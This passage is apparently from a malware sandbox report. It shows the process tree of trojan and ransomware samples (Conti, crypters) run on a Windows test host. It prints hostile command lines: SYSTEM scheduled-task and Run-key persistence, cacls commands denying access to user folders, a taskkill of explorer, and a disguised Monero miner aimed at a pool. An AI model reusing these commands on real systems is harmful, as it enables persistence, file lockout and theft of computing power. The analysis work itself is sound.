                                                                                                                                                                                  • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-d30f8ab0ebfb2693868970788d6b768930935d596795c46e0f917eafed1e583f.exe
                                                                                                                                                                                    HEUR-Trojan.MSIL.Crypt.gen-d30f8ab0ebfb2693868970788d6b768930935d596795c46e0f917eafed1e583f.exe
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4544
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 940
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:8948
                                                                                                                                                                                    • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-d478dbf8fedf4940ffe233ffa6f48a4445f66be0b573764d54965ca020ce120b.exe
                                                                                                                                                                                      HEUR-Trojan.MSIL.Crypt.gen-d478dbf8fedf4940ffe233ffa6f48a4445f66be0b573764d54965ca020ce120b.exe
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:7264
                                                                                                                                                                                        • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-d478dbf8fedf4940ffe233ffa6f48a4445f66be0b573764d54965ca020ce120b.exe
                                                                                                                                                                                          "{path}"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:2716
                                                                                                                                                                                        • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-df2579690ff271d7b427b90831933ccd7d57f7b226b58352632fc00956f7a589.exe
                                                                                                                                                                                          HEUR-Trojan.MSIL.Crypt.gen-df2579690ff271d7b427b90831933ccd7d57f7b226b58352632fc00956f7a589.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:7052
                                                                                                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-df2579690ff271d7b427b90831933ccd7d57f7b226b58352632fc00956f7a589.exe
                                                                                                                                                                                              C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-df2579690ff271d7b427b90831933ccd7d57f7b226b58352632fc00956f7a589.exe
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:9428
                                                                                                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exe
                                                                                                                                                                                              HEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exe
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:7128
                                                                                                                                                                                                • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exe
                                                                                                                                                                                                  C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exe
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:8484
                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exe
                                                                                                                                                                                                    C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:8708
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 8708 -s 1228
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:10228
                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.vho-ed687cfd5e9412824d9fe7acda9f17323ea1c77d05ed97b4e87d02b8f48ebdcd.exe
                                                                                                                                                                                                    HEUR-Trojan.MSIL.Crypt.vho-ed687cfd5e9412824d9fe7acda9f17323ea1c77d05ed97b4e87d02b8f48ebdcd.exe
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:9532
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Cryptos.gen-5914f09546ad6d40a05fb5ed71498ec88279fd420279a6d9a802b1f8ec1b2423.exe
                                                                                                                                                                                                      HEUR-Trojan.MSIL.Cryptos.gen-5914f09546ad6d40a05fb5ed71498ec88279fd420279a6d9a802b1f8ec1b2423.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:10040
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM" & exit
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:8704
                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM"
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                              PID:1620
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:1772
                                                                                                                                                                                                            • C:\Users\Admin\Services32.exe
                                                                                                                                                                                                              "C:\Users\Admin\Services32.exe"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1808
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM" & exit
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:6808
                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:5848
                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.f2pool.com:13531 --user=enesaltdeneme --pass= --cpu-max-threads-hint=70 --donate-level=5 --cinit-idle-wait=3 --cinit-idle-cpu=90 --cinit-stealth
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:9524
                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00450\HEUR-Trojan.Win32.Crypt.gen-4420e1edcb7735245bd485c772a2c388c1d85ba801b9373b89307977abae7a0d.exe
                                                                                                                                                                                                                  HEUR-Trojan.Win32.Crypt.gen-4420e1edcb7735245bd485c772a2c388c1d85ba801b9373b89307977abae7a0d.exe
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:9604
                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00450\HEUR-Trojan.Win32.Crypt.gen-4420e1edcb7735245bd485c772a2c388c1d85ba801b9373b89307977abae7a0d.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00450\HEUR-Trojan.Win32.Crypt.gen-4420e1edcb7735245bd485c772a2c388c1d85ba801b9373b89307977abae7a0d.exe" -a
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:9168
                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00450\HEUR-Trojan.Win32.Crypt.gen-9206ef496f748ac2da75ca61d990666da6427a3344d2873a934b9169fb0df75e.exe
                                                                                                                                                                                                                      HEUR-Trojan.Win32.Crypt.gen-9206ef496f748ac2da75ca61d990666da6427a3344d2873a934b9169fb0df75e.exe
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:4416
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS04159D09\setup_install.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zS04159D09\setup_install.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:7296
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:6284
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_1.exe
                                                                                                                                                                                                                                  sonia_1.exe
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:6340
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_1.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_1.exe" -a
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:5248
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:6328
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_2.exe
                                                                                                                                                                                                                                        sonia_2.exe
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:9896
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 9896 -s 340
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            PID:3932
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:9280
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_3.exe
                                                                                                                                                                                                                                            sonia_3.exe
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:6944
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 1028
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                PID:4304
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:9696
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_4.exe
                                                                                                                                                                                                                                                sonia_4.exe
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:6268
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:9616
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_5.exe
                                                                                                                                                                                                                                                    sonia_5.exe
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:9700
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:9816
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_6.exe
                                                                                                                                                                                                                                                        sonia_6.exe
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                          PID:9044
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:5724
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_7.exe
                                                                                                                                                                                                                                                            sonia_7.exe
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:9872
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_8.exe
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:8104
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_8.exe
                                                                                                                                                                                                                                                                sonia_8.exe
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:3448
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c sonia_9.exe
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:6840
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_9.exe
                                                                                                                                                                                                                                                                    sonia_9.exe
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:9372
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7296 -s 556
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:6252
                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00450\HEUR-Trojan.Win32.Crypt.gen-d788913f95cc9cc9b9e7605302edba4376182827de0f4a2d3116542ad1329e14.exe
                                                                                                                                                                                                                                                                HEUR-Trojan.Win32.Crypt.gen-d788913f95cc9cc9b9e7605302edba4376182827de0f4a2d3116542ad1329e14.exe
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:6132
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 260
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:5972
                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exe
                                                                                                                                                                                                                                                                  Trojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exe
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:9820
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exe
                                                                                                                                                                                                                                                                      Trojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exe
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:4660
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exe
                                                                                                                                                                                                                                                                          Trojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exe
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:4648
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Cryptor.eay-63625702e63e333f235b5025078cea1545f29b1ad42b1e46031911321779b6be.exe
                                                                                                                                                                                                                                                                        Trojan-Ransom.Win32.Cryptor.eay-63625702e63e333f235b5025078cea1545f29b1ad42b1e46031911321779b6be.exe
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:9500
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Encoder.nbm-ea97137ea1a041c3c00da972b49da8e709b2e66470fbbfd00387745d0e29b365.exe
                                                                                                                                                                                                                                                                          Trojan-Ransom.Win32.Encoder.nbm-ea97137ea1a041c3c00da972b49da8e709b2e66470fbbfd00387745d0e29b365.exe
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:6192
                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A07C.tmp\A07D.tmp\A07E.bat C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Encoder.nbm-ea97137ea1a041c3c00da972b49da8e709b2e66470fbbfd00387745d0e29b365.exe"
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:300
                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                  reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wtry /f
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                  • Modifies registry key
                                                                                                                                                                                                                                                                                  PID:5736
                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:5332
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                                                                                                                                                                                                    cacls "C:\Users\Admin\Music\*.*" /e /d everyone
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:8340
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:7704
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cacls.exe
                                                                                                                                                                                                                                                                                        cacls "C:\Users\Admin\Downloads\*.*" /e /d everyone
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:10168
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:3444
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cacls.exe
                                                                                                                                                                                                                                                                                            cacls "C:\Users\Admin\Links\*.*" /e /d everyone
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:6356
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:9816
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                                                                                                                                                                                                                cacls "C:\Users\Admin\Favorites\*.*" /e /d everyone
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:1444
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:7712
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                                                                                                                                                                                                                    cacls "C:\Users\Admin\Documents\*.*" /e /d everyone
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:1096
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:8024
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cacls.exe
                                                                                                                                                                                                                                                                                                        cacls "C:\Users\Admin\Videos\*.*" /e /d everyone
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:10120
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:6864
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cacls.exe
                                                                                                                                                                                                                                                                                                            cacls "C:\Users\Admin\Pictures\*.*" /e /d everyone
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:6724
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:5764
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                                                                                                                                                                                                                                cacls "C:\Users\Admin\Desktop\*.*" /e /d everyone
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:6832
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                                                                                  taskkill /f /im explorer.exe
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                  PID:5200
                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                  explorer.exe
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:8732
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "mstray" /t REG_SZ /d "C:\Windows\system32\mstray.exe" /f
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:9224
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\mstray.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\mstray.exe
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:8448
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\91A2.tmp\91A3.tmp\91A4.bat C:\Windows\system32\mstray.exe"
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                            PID:9260
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                              timeout /t 3
                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                              PID:7068
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                PID:7688
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                  PID:7196
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                timeout /t 3
                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                PID:9788
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                  PID:8488
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                    tasklist
                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                    PID:7520
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                  timeout /t 3
                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                  PID:8956
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                    PID:1368
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                      tasklist
                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                      PID:3480
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                    timeout /t 3
                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                    PID:1728
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                      PID:9460
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                        tasklist
                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                        PID:7284
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                      timeout /t 3
                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                      PID:520
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                        PID:2884
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                          tasklist
                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                          PID:8656
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                        timeout /t 3
                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                        PID:5764
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                          PID:9284
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                            tasklist
                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                            PID:8088
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                          timeout /t 3
                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                          PID:8364
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
